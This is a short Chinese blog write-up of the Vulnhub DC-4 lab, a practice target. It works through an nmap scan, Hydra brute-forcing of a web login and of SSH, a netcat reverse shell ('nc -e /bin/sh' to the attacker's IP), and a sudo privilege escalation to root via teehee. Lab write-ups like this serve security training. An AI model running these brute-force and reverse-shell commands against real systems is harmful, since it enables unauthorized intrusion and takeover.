Vulnhub靶场之DC-4 AIS

道锋潜鳞
2020-04-16 / 0 评论 / 83 阅读 / 正在检测是否收录...

开头先解释一下为啥没有DC-3

DC3的虚拟机安装完后,设备无法联网,内网无法被发现,因此跳过。

老规矩,先查一下目标地址

192.168.75.137

使用nmap对目标进行扫描

nmap -sS -p 1-65535 -A 192.168.75.137

开启了80.22端口,直接访问80端口,看看是何方神圣

还是老规矩,上Hydra大杀器

hydra爆破密码: hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.75.137 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

如果你出现这种情况

请进入/usr/share/wordlists/路径下kali自带的密码字典rockyou.txt.gz进行解压:gzip -d rockyou.txt.gz

登录成功

用burp抓包查看

nc反弹shell: nc -e /bin/sh 192.168.75.129 4444

发现三个账户

jim的账户中有密码文件

爆破猜解ssh密码,与账户 hydra -L dc4.txt -P passwd.txt -t 6 ssh://192.168.75.131

登录进去。

看起来好像是有一个邮件的意思

噗,密码都出来了

登录上去

尝试sudo -l 提权,出现提示,使用teehee更改权限,并提权为root

0

评论 (0)

取消